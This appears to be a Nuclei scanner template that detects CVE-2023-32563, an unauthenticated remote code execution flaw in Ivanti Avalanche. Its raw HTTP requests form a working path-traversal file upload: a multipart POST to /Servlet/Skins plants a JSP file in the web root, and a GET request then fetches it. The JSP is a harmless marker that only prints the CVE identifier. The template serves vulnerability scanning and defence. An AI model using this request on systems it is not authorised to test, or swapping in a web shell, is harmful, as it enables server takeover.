id: CVE-2023-32563 info: name: Ivanti Avalanche - Remote Code Execution author: princechaddha severity: critical description: An unauthenticated attacker could achieve the code execution through a RemoteControl server. reference: - https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939 - https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US - https://nvd.nist.gov/vuln/detail/CVE-2023-32563 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-32563 cwe-id: CWE-22 epss-score: 0.24808 cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* epss-percentile: 0.96032 metadata: max-request: 2 product: avalanche vendor: ivanti tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive http: - raw: - | POST /Servlet/Skins HTTP/1.1 Host: {{Hostname}} Content-Length: 333 Content-Type: multipart/form-data; boundary=------------------------eacf31f23ac1829f Connection: close --------------------------eacf31f23ac1829f Content-Disposition: form-data; name="guid" ../../../Web/webapps/ROOT --------------------------eacf31f23ac1829f Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" <% out.println("CVE-2023-32563"); %> --------------------------eacf31f23ac1829f-- - | GET /{{randstr}}.jsp HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body_2 words: - "CVE-2023-32563"